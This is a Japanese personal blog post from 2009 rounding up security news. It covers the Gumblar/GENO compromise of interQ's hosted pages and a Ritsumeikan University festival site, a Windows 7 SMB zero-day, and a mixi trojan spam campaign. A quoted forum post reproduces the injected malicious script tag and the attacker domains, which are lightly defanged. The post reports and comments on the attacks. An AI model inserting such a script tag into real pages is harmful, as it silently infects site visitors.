アナログ
RSS  

たまに(活動が)落ち込んだりするけどGumblarは元気です2009/11/13 17:51

FFXI(仮)  interQ

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん - 無題なブログ
 GMOインターネットが運営するプロバイダ「interQ」(インターキュー)が会員向け?に提供してるホームページスペースで、「404 Error - Not Found」「403 Error - Forbidden」のページが改ざんされ、不正なJavaScriptコードが挿入された状態になってます。挿入されてるコードは、10月再来襲なGumblar(GENOウイルス)。

夕方みたところ改竄は修正されてましたが、告知を見つけることはできませんでした。

追記:interQ再改竄?
GENOウイルススレ ★22 - 2ch.net
678 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/11/14(土) 15:17:39
巻き込み規制喰らってるので携帯からorz

http://www●interq●or●jp/
Redirectにコードが仕込んであるっぽい
--
<meta http-equiv="refresh" CONTENT="0;URL=http://members●interq●or●jp/">
</head>
<script src=http://ykcv●org/upload_data/blogslideconf/hvkh●php ></script><body>
--
http://ykcv●org/upload_data/blogslideconf/hvkh●php
↓
http://forgottenchild●in/fieldtrips/shareyourlove●php

業種的にやばすぎるというか
終わってるだろ・・・

679 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/11/14(土) 16:56:08
>>678
今ソース見てきたけど、直ってね?

681 名前:679[] 投稿日:2009/11/14(土) 18:33:50
ありゃ、>>678のソースが復活してら。駄目だねこりゃ。


21時半頃に私も見てみました。確かに改竄されてますね。\(^o^)/オワタ


The Gumblar system - Viruslist.com - Analyst's Diary
本陣と感染ユーザ込み6層のシステムということらしい。
図解が分かりやすいのでここに貼りたいくらい(自重w)。


ちょっと前の話になりますが(スルーしてましたがついでにw)
GENOウイルススレ ★22 - 2ch.net
666 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/09(月) 19:30:54
立命館大学の学園祭HPが感染したってマジか?

667 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/09(月) 20:56:59
>>666
貴方↓の中の人ですか?
ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/
Gumblar.xですか。
ソースチェカー
ttp://so.7walker.net/index.php?site=http://www.rits-fes-by-e2.net/&hua=
Googleから行くと弾かれますね。

立命館大学衣笠学園祭事務局 問い合わせ
ttp://www.rits-fes.net/mail/index.html
TEL/FAX:
↑
電話で教えて差し上げましたが対応が最悪です。
挙句の果てに電話を切られました。もうね、アホかとw

669 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/09(月) 21:12:18
>>667
今行くと404が出るからやっと対応したのかな?
でも今日の時点でアクセスカウンターが3万行ってたんだから
きちんと経緯とかを説明して欲しいね

673 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/10(火) 18:53:13
ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=立命館大学BKC学園祭事務局 077-561-3990&btnG=検索&lr=&aq=f&oq=
立命館大学BKC学園祭事務局 TEL:
↑
に電話をしたところ、話の途中でFAX回線に切り替えられましたw
ピーピロピロピーってorz

[PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題
ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf
カタカナ英語使えばいいってもんじゃないっしょww

こちらも改竄の告知は見つけられませんでした。

マスゴミは改竄の告知をしないところはスルーするので、正直者が馬鹿をみる典型的な例ですよねぇ。

関連:Gumblar攻撃再開(要注意):対策とか関連とか

セキュリティホール memo
Windows 7 / Windows Server 2008 R2 Remote SMB Exploit
 Windows 7 / Windows Server 2008 R2 の SMB クライアント実装に 0-day 欠陥があり、攻略 SMB サーバに接続すると DoS 攻撃を食らう……という理解でいいのかな。 この欠陥は、SMBv2 を無効にすることでは対応できないそうで。

元の英文が(私が英語がさっぱりなので)チンプンカンプンだったのですけれど、陥落したサーバに繋ぐとやられるってことだったのかぁ。

MicrosoftのSMBに新たな脆弱性? 最新OSに影響 - ITmedia News
SANSでエクスプロイトコードを試したところ、Windowsホストがフリーズしてマウスやキーボードが使えなくなったという。

窓の杜 - 【REVIEW】USBストレージの利用を手軽に制限できる「USB Storage Device Config Tool」
USBストレージの無効化・有効化を切り替えられるだけでなく、読み込みのみを許可することも可能だ。
許可されたUSBメモリ(IDで判別)だけアクセス可というソフトもあるといいなぁ。

mixiでスパムコメント出回る、感染でログイン情報盗まれる恐れ -INTERNET Watch
 投稿内容は、例えば「クエストダンジョン【Loki】虚像...」「パッシブチャンプが真っ赤なマーチ装備して...」などで、外部サイトにリンクするURLも書き込まれている。URLの末尾には「.lzh」「.zip」などの文字列が含まれる。

 ミクシィによれば、投稿されたURLをクリックするか、リンク先でダウンロードしたファイルを開くと、オンラインゲームや「mixi」のログインメールアドレス・パスワードの情報を盗むトロイの木馬に感染する可能性もあるという。
解凍した挙げ句、実行ファイルを起動するなんて、まさにカモネギ。
SNSにはカモが群生しているようです。

ネタが無くて困ってましたが、セキュリティネタなんて欲しくないんです。orz

コメント

コメントをどうぞ

※メールアドレスとURLの入力は必須ではありません。 入力されたメールアドレスは記事に反映されず、ブログの管理者のみが参照できます。

※投稿には管理者が設定した質問に答える必要があります。

名前:
メールアドレス:
URL:
次の質問に答えてください:
スパムがウザイので合い言葉を入れるようにしました。山と言えば川だろJK


コメント:

トラックバック

このエントリのトラックバックURL: http://puppet.asablo.jp/blog/2009/11/13/4692801/tb

※なお、送られたトラックバックはブログの管理者が確認するまで公開されません。